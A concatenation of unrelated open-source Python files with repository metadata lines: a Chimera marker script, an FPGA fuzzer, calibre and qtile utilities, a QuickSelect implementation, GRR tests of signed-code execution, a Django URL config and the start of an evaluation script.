marker_sets["particle_21 geometry"]=s
s= marker_sets["particle_21 geometry"]
mark=s.place_marker((5638.44, 5177.54, 7891.7), (0.7, 0.7, 0.7), 653.154)
if "particle_22 geometry" not in marker_sets:
s=new_marker_set('particle_22 geometry')
marker_sets["particle_22 geometry"]=s
s= marker_sets["particle_22 geometry"]
mark=s.place_marker((5156.54, 6084.88, 8745.39), (0.7, 0.7, 0.7), 595.33)
if "particle_23 geometry" not in marker_sets:
s=new_marker_set('particle_23 geometry')
marker_sets["particle_23 geometry"]=s
s= marker_sets["particle_23 geometry"]
mark=s.place_marker((5923.88, 7005.17, 8837.07), (0.7, 0.7, 0.7), 627.901)
if "particle_24 geometry" not in marker_sets:
s=new_marker_set('particle_24 geometry')
marker_sets["particle_24 geometry"]=s
s= marker_sets["particle_24 geometry"]
mark=s.place_marker((6410.7, 6081.58, 7580.41), (0.7, 0.7, 0.7), 663.941)
if "particle_25 geometry" not in marker_sets:
s=new_marker_set('particle_25 geometry')
marker_sets["particle_25 geometry"]=s
s= marker_sets["particle_25 geometry"]
mark=s.place_marker((5235.86, 5293.96, 7603.87), (0.7, 0.7, 0.7), 663.899)
if "particle_26 geometry" not in marker_sets:
s=new_marker_set('particle_26 geometry')
marker_sets["particle_26 geometry"]=s
s= marker_sets["particle_26 geometry"]
mark=s.place_marker((5304.5, 4901.89, 8988.58), (0.7, 0.7, 0.7), 644.694)
if "particle_27 geometry" not in marker_sets:
s=new_marker_set('particle_27 geometry')
marker_sets["particle_27 geometry"]=s
s= marker_sets["particle_27 geometry"]
mark=s.place_marker((4263.21, 5754.37, 8348.04), (0.7, 0.7, 0.7), 896.802)
if "particle_28 geometry" not in marker_sets:
s=new_marker_set('particle_28 geometry')
marker_sets["particle_28 geometry"]=s
s= marker_sets["particle_28 geometry"]
mark=s.place_marker((4870.84, 4604.77, 7808.76), (0.7, 0.7, 0.7), 576.38)
if "particle_29 geometry" not in marker_sets:
s=new_marker_set('particle_29 geometry')
marker_sets["particle_29 geometry"]=s
s= marker_sets["particle_29 geometry"]
mark=s.place_marker((3865.44, 4119.95, 7206.64), (0.7, 0.7, 0.7), 635.092)
if "particle_30 geometry" not in marker_sets:
s=new_marker_set('particle_30 geometry')
marker_sets["particle_30 geometry"]=s
s= marker_sets["particle_30 geometry"]
mark=s.place_marker((4840.02, 5330.07, 6865.76), (0.7, 0.7, 0.7), 651.505)
if "particle_31 geometry" not in marker_sets:
s=new_marker_set('particle_31 geometry')
marker_sets["particle_31 geometry"]=s
s= marker_sets["particle_31 geometry"]
mark=s.place_marker((5485.7, 6029.85, 5658.37), (0.7, 0.7, 0.7), 718.042)
if "particle_32 geometry" not in marker_sets:
s=new_marker_set('particle_32 geometry')
marker_sets["particle_32 geometry"]=s
s= marker_sets["particle_32 geometry"]
mark=s.place_marker((4891.75, 6539.86, 6957), (0.7, 0.7, 0.7), 726.714)
if "particle_33 geometry" not in marker_sets:
s=new_marker_set('particle_33 geometry')
marker_sets["particle_33 geometry"]=s
s= marker_sets["particle_33 geometry"]
mark=s.place_marker((5232.65, 5807.76, 8197.38), (0.7, 0.7, 0.7), 673.585)
if "particle_34 geometry" not in marker_sets:
s=new_marker_set('particle_34 geometry')
marker_sets["particle_34 geometry"]=s
s= marker_sets["particle_34 geometry"]
mark=s.place_marker((5824.18, 5848.85, 8884.05), (0.7, 0.7, 0.7), 598.418)
if "particle_35 geometry" not in marker_sets:
s=new_marker_set('particle_35 geometry')
marker_sets["particle_35 geometry"]=s
s= marker_sets["particle_35 geometry"]
mark=s.place_marker((5230.41, 6717.68, 9996.71), (0.7, 0.7, 0.7), 697.612)
if "particle_36 geometry" not in marker_sets:
s=new_marker_set('particle_36 geometry')
marker_sets["particle_36 geometry"]=s
s= marker_sets["particle_36 geometry"]
mark=s.place_marker((4479.11, 6912.39, 6996.33), (0.7, 0.7, 0.7), 799.808)
if "particle_37 geometry" not in marker_sets:
s=new_marker_set('particle_37 geometry')
marker_sets["particle_37 geometry"]=s
s= marker_sets["particle_37 geometry"]
mark=s.place_marker((4211.7, 8873.75, 5724.08), (0.7, 0.7, 0.7), 1132.58)
if "particle_38 geometry" not in marker_sets:
s=new_marker_set('particle_38 geometry')
marker_sets["particle_38 geometry"]=s
s= marker_sets["particle_38 geometry"]
mark=s.place_marker((3705.9, 8372.41, 5301.81), (0.7, 0.7, 0.7), 1011.94)
if "particle_39 geometry" not in marker_sets:
s=new_marker_set('particle_39 geometry')
marker_sets["particle_39 geometry"]=s
s= marker_sets["particle_39 geometry"]
mark=s.place_marker((2828.31, 8572.74, 4102.1), (0.7, 0.7, 0.7), 782.592)
if "particle_40 geometry" not in marker_sets:
s=new_marker_set('particle_40 geometry')
marker_sets["particle_40 geometry"]=s
s= marker_sets["particle_40 geometry"]
mark=s.place_marker((2636.82, 10355, 4249.58), (0.7, 0.7, 0.7), 856.575)
if "particle_41 geometry" not in marker_sets:
s=new_marker_set('particle_41 geometry')
marker_sets["particle_41 geometry"]=s
s= marker_sets["particle_41 geometry"]
mark=s.place_marker((2444.39, 11333.3, 4461.4), (1, 0.7, 0), 706.579)
if "particle_42 geometry" not in marker_sets:
s=new_marker_set('particle_42 geometry')
marker_sets["particle_42 geometry"]=s
s= marker_sets["particle_42 geometry"]
mark=s.place_marker((2963.15, 10357.9, 4221.01), (0.7, 0.7, 0.7), 1015.96)
if "particle_43 geometry" not in marker_sets:
s=new_marker_set('particle_43 geometry')
marker_sets["particle_43 geometry"]=s
s= marker_sets["particle_43 geometry"]
mark=s.place_marker((3510.15, 7766.31, 3156.33), (0.7, 0.7, 0.7), 1205.72)
if "particle_44 geometry" not in marker_sets:
s=new_marker_set('particle_44 geometry')
marker_sets["particle_44 geometry"]=s
s= marker_sets["particle_44 geometry"]
mark=s.place_marker((2766.72, 5976.98, 2313.02), (0.7, 0.7, 0.7), 841.939)
if "particle_45 geometry" not in marker_sets:
s=new_marker_set('particle_45 geometry')
marker_sets["particle_45 geometry"]=s
s= marker_sets["particle_45 geometry"]
mark=s.place_marker((4200.28, 6571.28, 2101.41), (1, 0.7, 0), 806.999)
if "particle_46 geometry" not in marker_sets:
s=new_marker_set('particle_46 geometry')
marker_sets["particle_46 geometry"]=s
s= marker_sets["particle_46 geometry"]
mark=s.place_marker((4042.15, 6204.4, 1642.51), (0.7, 0.7, 0.7), 958.856)
if "particle_47 geometry" not in marker_sets:
s=new_marker_set('particle_47 geometry')
marker_sets["particle_47 geometry"]=s
s= marker_sets["particle_47 geometry"]
mark=s.place_marker((5084.42, 4620.36, 1342.83), (0.7, 0.7, 0.7), 952.892)
if "particle_48 geometry" not in marker_sets:
s=new_marker_set('particle_48 geometry')
marker_sets["particle_48 geometry"]=s
s= marker_sets["particle_48 geometry"]
mark=s.place_marker((4632.97, 3973.45, 898.818), (0.7, 0.7, 0.7), 809.284)
if "particle_49 geometry" not in marker_sets:
s=new_marker_set('particle_49 geometry')
marker_sets["particle_49 geometry"]=s
s= marker_sets["particle_49 geometry"]
mark=s.place_marker((4110.65, 4682.32, 826.943), (0.7, 0.7, 0.7), 709.159)
if "particle_50 geometry" not in marker_sets:
s=new_marker_set('particle_50 geometry')
marker_sets["particle_50 geometry"]=s
s= marker_sets["particle_50 geometry"]
mark=s.place_marker((4416.16, 3277.34, 1846), (0.7, 0.7, 0.7), 859.832)
if "particle_51 geometry" not in marker_sets:
s=new_marker_set('particle_51 geometry')
marker_sets["particle_51 geometry"]=s
s= marker_sets["particle_51 geometry"]
mark=s.place_marker((5399.69, 3165.07, 3287.79), (0.7, 0.7, 0.7), 800.866)
if "particle_52 geometry" not in marker_sets:
s=new_marker_set('particle_52 geometry')
marker_sets["particle_52 geometry"]=s
s= marker_sets["particle_52 geometry"]
mark=s.place_marker((3611.81, 2979.39, 3437.4), (0.7, 0.7, 0.7), 949.508)
if "particle_53 geometry" not in marker_sets:
s=new_marker_set('particle_53 geometry')
marker_sets["particle_53 geometry"]=s
s= marker_sets["particle_53 geometry"]
mark=s.place_marker((2517.55, 4315.35, 4211.27), (0.7, 0.7, 0.7), 891.98)
if "particle_54 geometry" not in marker_sets:
s=new_marker_set('particle_54 geometry')
marker_sets["particle_54 geometry"]=s
s= marker_sets["particle_54 geometry"]
mark=s.place_marker((4402.1, 4157.94, 4876.63), (0.7, 0.7, 0.7), 890.034)
if "particle_55 geometry" not in marker_sets:
s=new_marker_set('particle_55 geometry')
marker_sets["particle_55 geometry"]=s
s= marker_sets["particle_55 geometry"]
mark=s.place_marker((4700.22, 3394.99, 3359.54), (0.7, 0.7, 0.7), 804.165)
if "particle_56 geometry" not in marker_sets:
s=new_marker_set('particle_56 geometry')
marker_sets["particle_56 geometry"]=s
s= marker_sets["particle_56 geometry"]
mark=s.place_marker((5427.31, 2372.95, 4222.7), (0.7, 0.7, 0.7), 826.796)
if "particle_57 geometry" not in marker_sets:
s=new_marker_set('particle_57 geometry')
marker_sets["particle_57 geometry"]=s
s= marker_sets["particle_57 geometry"]
mark=s.place_marker((3626.5, 1687.89, 4025.98), (0.7, 0.7, 0.7), 1085.8)
if "particle_58 geometry" not in marker_sets:
s=new_marker_set('particle_58 geometry')
marker_sets["particle_58 geometry"]=s
s= marker_sets["particle_58 geometry"]
mark=s.place_marker((3848.24, 4107.59, 4836.74), (0.7, 0.7, 0.7), 906.997)
if "particle_59 geometry" not in marker_sets:
s=new_marker_set('particle_59 geometry')
marker_sets["particle_59 geometry"]=s
s= marker_sets["particle_59 geometry"]
mark=s.place_marker((3250.23, 2911.49, 3793.8), (0.7, 0.7, 0.7), 708.694)
if "particle_60 geometry" not in marker_sets:
s=new_marker_set('particle_60 geometry')
marker_sets["particle_60 geometry"]=s
s= marker_sets["particle_60 geometry"]
mark=s.place_marker((3968.91, 2921.79, 2577.87), (0.7, 0.7, 0.7), 780.223)
if "particle_61 geometry" not in marker_sets:
s=new_marker_set('particle_61 geometry')
marker_sets["particle_61 geometry"]=s
s= marker_sets["particle_61 geometry"]
mark=s.place_marker((4225.56, 2865.53, 2425.5), (0.7, 0.7, 0.7), 757.424)
if "particle_62 geometry" not in marker_sets:
s=new_marker_set('particle_62 geometry')
marker_sets["particle_62 geometry"]=s
s= marker_sets["particle_62 geometry"]
mark=s.place_marker((5492.47, 2931.67, 1416.64), (0.7, 0.7, 0.7), 817.574)
if "particle_63 geometry" not in marker_sets:
s=new_marker_set('particle_63 geometry')
marker_sets["particle_63 geometry"]=s
s= marker_sets["particle_63 geometry"]
mark=s.place_marker((5296.32, 3257.55, -202.453), (0.7, 0.7, 0.7), 782.423)
if "particle_64 geometry" not in marker_sets:
s=new_marker_set('particle_64 geometry')
marker_sets["particle_64 geometry"]=s
s= marker_sets["particle_64 geometry"]
mark=s.place_marker((5712.92, 4129.29, 1315.28), (0.7, 0.7, 0.7), 906.404)
if "particle_65 geometry" not in marker_sets:
s=new_marker_set('particle_65 geometry')
marker_sets["particle_65 geometry"]=s
s= marker_sets["particle_65 geometry"]
mark=s.place_marker((3950.9, 3652.02, 1475.87), (0.7, 0.7, 0.7), 818.463)
if "particle_66 geometry" not in marker_sets:
s=new_marker_set('particle_66 geometry')
marker_sets["particle_66 geometry"]=s
s= marker_sets["particle_66 geometry"]
mark=s.place_marker((5427.49, 3550.32, 2015.8), (0.7, 0.7, 0.7), 759.539)
if "particle_67 geometry" not in marker_sets:
s=new_marker_set('particle_67 geometry')
marker_sets["particle_67 geometry"]=s
s= marker_sets["particle_67 geometry"]
mark=s.place_marker((6166.49, 4537.85, 638.288), (0.7, 0.7, 0.7), 1088.59)
if "particle_68 geometry" not in marker_sets:
s=new_marker_set('particle_68 geometry')
marker_sets["particle_68 geometry"]=s
s= marker_sets["particle_68 geometry"]
mark=s.place_marker((4548.93, 3360.53, 106.679), (0.7, 0.7, 0.7), 822.312)
if "particle_69 geometry" not in marker_sets:
s=new_marker_set('particle_69 geometry')
marker_sets["particle_69 geometry"]=s
s= marker_sets["particle_69 geometry"]
mark=s.place_marker((4332.63, 4191.46, 213.715), (0.7, 0.7, 0.7), 749.81)
if "particle_70 geometry" not in marker_sets:
s=new_marker_set('particle_70 geometry')
marker_sets["particle_70 geometry"]=s
s= marker_sets["particle_70 geometry"]
mark=s.place_marker((5028.96, 3412.62, 398.975), (0.7, 0.7, 0.7), 764.488)
for k in surf_sets.keys():
chimera.openModels.add([surf_sets[k]])
| batxes/4Cin | SHH_INV_models/SHH_INV_models_final_output_0.2_-0.1_10000/SHH_INV_models38317.py | Python | gpl-3.0 | 17,570 |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
# Copyright 2020-2022 F4PGA Authors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# SPDX-License-Identifier: Apache-2.0
from utils.spec import slice_logic
from utils.spec import slice_carry
from utils.spec import slice_memory
from utils.spec import flipflops
from utils.spec import memory
from utils import spec_top
SPECS = (
(slice_memory, 10),
(slice_logic, 10),
(memory, 10),
(flipflops, 10),
(slice_carry, 10),
)
def main():
spec_top.spec_top(SPECS)
if __name__ == "__main__":
main()
| SymbiFlow/prjuray | fuzzers/014-cle-spec/top.py | Python | isc | 1,073 |
#!/usr/bin/env python2
# vim:fileencoding=utf-8
# License: GPLv3 Copyright: 2016, Kovid Goyal <kovid at kovidgoyal.net>
from __future__ import (unicode_literals, division, absolute_import,
print_function)
import subprocess, re
from calibre.constants import iswindows, isosx
def get_address_of_default_gateway(family='AF_INET'):
import netifaces
ip = netifaces.gateways()['default'][getattr(netifaces, family)][0]
if isinstance(ip, bytes):
ip = ip.decode('ascii')
return ip
def get_addresses_for_interface(name, family='AF_INET'):
import netifaces
for entry in netifaces.ifaddresses(name)[getattr(netifaces, family)]:
if entry.get('broadcast'): # Not a point-to-point address
addr = entry.get('addr')
if addr:
if isinstance(addr, bytes):
addr = addr.decode('ascii')
yield addr
if iswindows:
def get_default_route_src_address_external():
# Use -6 for IPv6 addresses
raw = subprocess.check_output('route -4 print 0.0.0.0'.split(), creationflags=0x08).decode('utf-8', 'replace')
in_table = False
default_gateway = get_address_of_default_gateway()
for line in raw.splitlines():
parts = line.strip().split()
if in_table:
if len(parts) == 6:
network, destination, netmask, gateway, interface, metric = parts
elif len(parts) == 5:
destination, netmask, gateway, interface, metric = parts
if gateway == default_gateway:
return interface
else:
if parts == 'Network Destination Netmask Gateway Interface Metric'.split():
in_table = True
def get_default_route_src_address_api():
from calibre.utils.iphlpapi import routes
for route in routes():
if route.interface and route.destination == '0.0.0.0':
for addr in get_addresses_for_interface(route.interface):
return addr
get_default_route_src_address = get_default_route_src_address_api
elif isosx:
def get_default_route_src_address():
# Use -inet6 for IPv6
raw = subprocess.check_output('route -n get -inet default'.split()).decode('utf-8')
m = re.search(r'^\s*interface:\s*(\S+)\s*$', raw, flags=re.MULTILINE)
if m is not None:
interface = m.group(1)
for addr in get_addresses_for_interface(interface):
return addr
else:
def get_default_route_src_address():
# Use /proc/net/ipv6_route for IPv6 addresses
raw = open('/proc/net/route', 'rb').read().decode('utf-8')
for line in raw.splitlines():
parts = line.split()
if len(parts) > 1 and parts[1] == '00000000':
for addr in get_addresses_for_interface(parts[0]):
return addr
if __name__ == '__main__':
print(get_default_route_src_address())
| hazrpg/calibre | src/calibre/utils/ip_routing.py | Python | gpl-3.0 | 3,044 |
# coding: utf-8
#
# Copyright (c) 2008, Aldo Cortesi <aldo@corte.si>
# Copyright (c) 2011, Andrew Grigorev <andrew@ei-grad.ru>
#
# All rights reserved.
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import os
import sys
import traceback
class ConfigError(Exception):
pass
class File(object):
def __init__(self, fname=None, is_restart=False):
if not fname:
config_directory = os.path.expandvars('$XDG_CONFIG_HOME')
if config_directory == '$XDG_CONFIG_HOME':
# if variable wasn't set
config_directory = os.path.expanduser("~/.config")
fname = os.path.join(config_directory, "qtile", "config.py")
# We delay importing here to avoid a circular import issue when
# testing.
from .resources import default_config
if fname == "default":
config = default_config
elif os.path.isfile(fname):
try:
sys.path.insert(0, os.path.dirname(fname))
config = __import__(os.path.basename(fname)[:-3])
except Exception as v:
# On restart, user potentially has some windows open, but they
# screwed up their config. So as not to lose their apps, we
# just load the default config here.
if is_restart:
traceback.print_exc()
config = None
else:
tb = traceback.format_exc()
raise ConfigError(str(v) + "\n\n" + tb)
else:
config = None
# if you add something here, be sure to add a reasonable default value
# to resources/default_config.py
config_options = [
"keys",
"mouse",
"groups",
"dgroups_key_binder",
"dgroups_app_rules",
"follow_mouse_focus",
"cursor_warp",
"layouts",
"floating_layout",
"screens",
"main",
"auto_fullscreen",
"widget_defaults",
"bring_front_click",
"wmname",
]
for option in config_options:
if hasattr(config, option):
v = getattr(config, option)
else:
v = getattr(default_config, option)
if not hasattr(self, option):
setattr(self, option, v)
| kiniou/qtile | libqtile/confreader.py | Python | mit | 3,436 |
#!/usr/bin/python
######################################################################
# Autor: Andrés Herrera Poyatos
# Universidad de Granada, January, 2015
# Sorting Algorithm: QuickSelect
#######################################################################
# This program read an integer array from a file a execute the QuickSelect
# algorithm on it to find the ith order statistic element given as an argument.
# Several variants of QuickSelect are given such as Lomuto or Hoare partition algorithm
# or some pivot selection methods. Choose the one you like but the best
# one is the implemented by defect.
#
# This algorithm is based on QuickSort. With a similar analisys than the one done
# for QuickSort you can see it is lineal in average but it has a quadratic worst case.
import sys # For arguments (syc.argv) and exit (syc.exit())
import time # To time the program
from random import randrange # Random integer generator
# Swap two elements in the array
def swap(array, i, j):
aux = array[i]; array[i] = array[j]; array[j] = aux
# Select a random pivot for the subarray [begin,end[ and put it in the
# position begin. It's value is returned.
def selectRandomPivot(array, begin, end):
swap(array, begin, randrange(begin, end))
return array[begin]
# Select a pivot for the subarray [begin,end[ and put it in the
# position begin. The pivot is selected as the median of 3 elements.
# It's value is returned.
def selectPivotMedian(array, begin, end):
end -= 1; middle = (begin + end) // 2
if array[begin] <= array[end]:
if array[begin] >= array[middle]:
index = begin
else:
index = middle if array[middle] <= array[end] else end
else:
if array[begin] <= array[middle]:
index = begin
else:
index = middle if array[middle] >= array[end] else end
swap(array, index, begin)
return array[begin]
# Function that do a partition of the subarray [begin,end[.
# It uses the Lomuto algorithm. The expected total number
# of swaps is n/2 - 1/2. It perfoms poorly when there are
# repeted elements in the array since it does not divide it
# properly.
def partitionLomuto(array, begin, end):
pivot = selectPivotMedian(array, begin, end)
j = begin + 1 # j points to the first element bigger than pivot
for i in range(begin+1, end):
if array[i] < pivot:
swap(array, j, i)
j += 1
swap(array, j-1, begin)
return j-1
# Function that do a partition of the subarray [begin,end[.
# It uses the Hoare algorithm. The expected total number
# of swaps is n/6 - 1/3. It's better than the previous
# partition scheme and, furthermore, it does good partitions
# with repeted elements.
# A further comparison in:
# http://cs.stackexchange.com/questions/11458/quicksort-partitioning-hoare-vs-lomuto
def partitionHoare(array, begin, end):
pivot = selectPivotMedian(array, begin, end)
i = begin
j = end - 1
while True:
while i < j and array[j] >= pivot:
j -= 1
while i < j and array[i] <= pivot:
i += 1
if i < j:
swap(array, i, j)
else:
swap(array, begin, j)
return j
# Function that selects the order-th element of array [begin, end[ according to
# the sorting relation of the elements. It is call the ith-order statistic element.
# The algorithms runs with O(n) as average time.
# It is the classical QuickSelect implementation.
# A partition it is performed and the search is done in the corresponding subarray.
def quickSelect(array, begin, end, order):
if end - begin == 1:
return array[begin]
elif end - begin > 1:
pivot_index = partitionHoare(array, begin, end)
if pivot_index > order:
return quickSelect(array, begin, pivot_index, order)
elif pivot_index < order:
return quickSelect(array, pivot_index+1, end, order)
else:
return array[pivot_index]
######################## MAIN ##########################
# See if arguments are correct
if len(sys.argv) != 3:
print("Error: Needs the array.txt and the order of the element asked as arguments.")
sys.exit()
# Read array
numbers = open(sys.argv[1])
array = [ ]
for line in numbers:
array.append(int(line))
# Get order and check it is correct
order = int(sys.argv[2])
if order < 0 or order >= len(array):
print("Error: Order must be between 0 and the length of the array - 1.")
sys.exit()
# Execute quickSelect and count the time wasted
start_time = time.time()
a = quickSelect(array, 0, len(array), order)
print("--- %f seconds ---" % (time.time() - start_time) )
print(order, "- ith order statistic: ", a)
numbers.close()
| andreshp/Algorithms | SelectionAlgorithms/Python/QuickSelect/Classical/QuickSelect.py | Python | gpl-2.0 | 4,821 |
#!/usr/bin/env python
# -*- mode: python; encoding: utf-8 -*-
# Copyright 2012 Google Inc. All Rights Reserved.
"""Test client standard actions."""
import gzip
import hashlib
import os
import time
from grr.client.client_actions import standard
from grr.lib import config_lib
from grr.lib import flags
from grr.lib import rdfvalue
from grr.lib import test_lib
from grr.lib import utils
class TestExecutePython(test_lib.EmptyActionTest):
"""Test the client execute actions."""
def setUp(self):
super(TestExecutePython, self).setUp()
self.signing_key = config_lib.CONFIG[
"PrivateKeys.executable_signing_private_key"]
def testExecutePython(self):
"""Test the basic ExecutePython action."""
utils.TEST_VAL = "original"
python_code = "utils.TEST_VAL = 'modified'"
signed_blob = rdfvalue.SignedBlob()
signed_blob.Sign(python_code, self.signing_key)
request = rdfvalue.ExecutePythonRequest(python_code=signed_blob)
result = self.RunAction("ExecutePython", request)[0]
self.assertTrue(result.time_used > 0)
self.assertEqual(result.return_val, "")
self.assertEqual(utils.TEST_VAL, "modified")
def testExecuteModifiedPython(self):
"""Test that rejects invalid ExecutePython action."""
utils.TEST_VAL = "original"
python_code = "utils.TEST_VAL = 'modified'"
signed_blob = rdfvalue.SignedBlob()
signed_blob.Sign(python_code, self.signing_key)
# Modify the data so the signature does not match.
signed_blob.data = "utils.TEST_VAL = 'notmodified'"
request = rdfvalue.ExecutePythonRequest(python_code=signed_blob)
# Should raise since the code has been modified.
self.assertRaises(rdfvalue.DecodeError,
self.RunAction, "ExecutePython", request)
# Lets also adjust the hash.
signed_blob.digest = hashlib.sha256(signed_blob.data).digest()
request = rdfvalue.ExecutePythonRequest(python_code=signed_blob)
self.assertRaises(rdfvalue.DecodeError,
self.RunAction, "ExecutePython", request)
# Make sure the code never ran.
self.assertEqual(utils.TEST_VAL, "original")
def testExecuteBrokenPython(self):
"""Test broken code raises back to the original flow."""
python_code = "raise ValueError"
signed_blob = rdfvalue.SignedBlob()
signed_blob.Sign(python_code, self.signing_key)
request = rdfvalue.ExecutePythonRequest(python_code=signed_blob)
self.assertRaises(ValueError,
self.RunAction, "ExecutePython", request)
def testExecuteBinary(self):
"""Test the basic ExecuteBinaryCommand action."""
signed_blob = rdfvalue.SignedBlob()
signed_blob.Sign(open("/bin/ls").read(), self.signing_key)
writefile = utils.Join(self.temp_dir, "binexecute", "ablob")
os.makedirs(os.path.dirname(writefile))
request = rdfvalue.ExecuteBinaryRequest(executable=signed_blob,
args=[__file__],
write_path=writefile)
result = self.RunAction("ExecuteBinaryCommand", request)[0]
self.assertTrue(result.time_used > 0)
self.assertTrue(__file__ in result.stdout)
def testReturnVals(self):
"""Test return values."""
python_code = "magic_return_str = 'return string'"
signed_blob = rdfvalue.SignedBlob()
signed_blob.Sign(python_code, self.signing_key)
request = rdfvalue.ExecutePythonRequest(python_code=signed_blob)
result = self.RunAction("ExecutePython", request)[0]
self.assertEqual(result.return_val, "return string")
def testWrongKey(self):
"""Test return values."""
python_code = "print 'test'"
# Generate a test valid RSA key that isn't the real one.
signing_key = rdfvalue.PEMPrivateKey.GenKey(2048, 65537)
signed_blob = rdfvalue.SignedBlob()
signed_blob.Sign(python_code, signing_key)
request = rdfvalue.ExecutePythonRequest(python_code=signed_blob)
self.assertRaises(rdfvalue.DecodeError, self.RunAction,
"ExecutePython", request)
def testArgs(self):
"""Test passing arguments."""
utils.TEST_VAL = "original"
python_code = """
magic_return_str = py_args['test']
utils.TEST_VAL = py_args[43]
"""
signed_blob = rdfvalue.SignedBlob()
signed_blob.Sign(python_code, self.signing_key)
pdict = rdfvalue.Dict({"test": "dict_arg",
43: "dict_arg2"})
request = rdfvalue.ExecutePythonRequest(python_code=signed_blob,
py_args=pdict)
result = self.RunAction("ExecutePython", request)[0]
self.assertEqual(result.return_val, "dict_arg")
self.assertEqual(utils.TEST_VAL, "dict_arg2")
class TestCopyPathToFile(test_lib.EmptyActionTest):
"""Test CopyPathToFile client actions."""
def setUp(self):
super(TestCopyPathToFile, self).setUp()
self.path_in = os.path.join(self.base_path, "morenumbers.txt")
self.hash_in = hashlib.sha1(open(self.path_in).read()).hexdigest()
self.pathspec = rdfvalue.PathSpec(
path=self.path_in, pathtype=rdfvalue.PathSpec.PathType.OS)
def testCopyPathToFile(self):
request = rdfvalue.CopyPathToFileRequest(offset=0,
length=0,
src_path=self.pathspec,
dest_dir=self.temp_dir,
gzip_output=False)
result = self.RunAction("CopyPathToFile", request)[0]
hash_out = hashlib.sha1(open(result.dest_path.path).read()).hexdigest()
self.assertEqual(self.hash_in, hash_out)
def testCopyPathToFileLimitLength(self):
request = rdfvalue.CopyPathToFileRequest(offset=0,
length=23,
src_path=self.pathspec,
dest_dir=self.temp_dir,
gzip_output=False)
result = self.RunAction("CopyPathToFile", request)[0]
output = open(result.dest_path.path).read()
self.assertEqual(len(output), 23)
def testCopyPathToFileOffsetandLimit(self):
with open(self.path_in) as f:
f.seek(38)
out = f.read(25)
hash_in = hashlib.sha1(out).hexdigest()
request = rdfvalue.CopyPathToFileRequest(offset=38,
length=25,
src_path=self.pathspec,
dest_dir=self.temp_dir,
gzip_output=False)
result = self.RunAction("CopyPathToFile", request)[0]
output = open(result.dest_path.path).read()
self.assertEqual(len(output), 25)
hash_out = hashlib.sha1(output).hexdigest()
self.assertEqual(hash_in, hash_out)
def testCopyPathToFileGzip(self):
request = rdfvalue.CopyPathToFileRequest(offset=0,
length=0,
src_path=self.pathspec,
dest_dir=self.temp_dir,
gzip_output=True)
result = self.RunAction("CopyPathToFile", request)[0]
self.assertEqual(hashlib.sha1(
gzip.open(result.dest_path.path).read()).hexdigest(), self.hash_in)
def testCopyPathToFileLifetimeLimit(self):
request = rdfvalue.CopyPathToFileRequest(offset=0,
length=23,
src_path=self.pathspec,
dest_dir=self.temp_dir,
gzip_output=False,
lifetime=0.1)
result = self.RunAction("CopyPathToFile", request)[0]
self.assertTrue(os.path.exists(result.dest_path.path))
time.sleep(1)
self.assertFalse(os.path.exists(result.dest_path.path))
class TestNetworkByteLimits(test_lib.EmptyActionTest):
"""Test CopyPathToFile client actions."""
def setUp(self):
super(TestNetworkByteLimits, self).setUp()
pathspec = rdfvalue.PathSpec(path="/nothing",
pathtype=rdfvalue.PathSpec.PathType.OS)
self.buffer_ref = rdfvalue.BufferReference(pathspec=pathspec, length=5000)
self.data = "X" * 500
self.old_read = standard.vfs.ReadVFS
standard.vfs.ReadVFS = lambda x, y, z: self.data
self.transfer_buf = test_lib.ActionMock("TransferBuffer")
def testTransferNetworkByteLimitError(self):
message = rdfvalue.GrrMessage(name="TransferBuffer",
payload=self.buffer_ref,
network_bytes_limit=300)
# We just get a client alert and a status message back.
responses = self.transfer_buf.HandleMessage(message)
client_alert = responses[0].payload
self.assertTrue("Network limit exceeded" in str(client_alert))
status = responses[1].payload
self.assertTrue("Action exceeded network send limit"
in str(status.backtrace))
self.assertEqual(status.status,
rdfvalue.GrrStatus.ReturnedStatus.NETWORK_LIMIT_EXCEEDED)
def testTransferNetworkByteLimit(self):
message = rdfvalue.GrrMessage(name="TransferBuffer",
payload=self.buffer_ref,
network_bytes_limit=900)
responses = self.transfer_buf.HandleMessage(message)
for response in responses:
if isinstance(response, rdfvalue.GrrStatus):
self.assertEqual(response.payload.status,
rdfvalue.GrrStatus.ReturnedStatus.OK)
def tearDown(self):
super(TestNetworkByteLimits, self).tearDown()
standard.vfs.ReadVFS = self.old_read
def main(argv):
test_lib.main(argv)
if __name__ == "__main__":
flags.StartMain(main)
| spnow/grr | client/client_actions/standard_test.py | Python | apache-2.0 | 9,903 |
from django.conf.urls import patterns, include, url
from django.contrib import admin
admin.autodiscover()
urlpatterns = patterns('',
url(r'^', include('ebets.urls')),
url(r'^admin/', include(admin.site.urls)),
)
| pisskidney/dota | dota/urls.py | Python | mit | 222 |
#!/usr/bin/python3
# -*- coding: UTF-8 -*-
import json
import sys
# Include custom libs
sys.path.append( '../../../include/python' )
import serverutils.config as config
from statistics import mean, median, stdev
import numpy as np
# Default property values
props = {'evalFile1': '../results-postprocessing/data/evaluation1.json',
'evalFile2': '../results-postprocessing/data/evaluation2.json',
'histogramFile': None,
'histogramInterval': 5000}
propDesc = {'evalFile1': 'Post-processed result file from first evaluation',
'evalFile2': 'Post-processed result file from second evaluation',
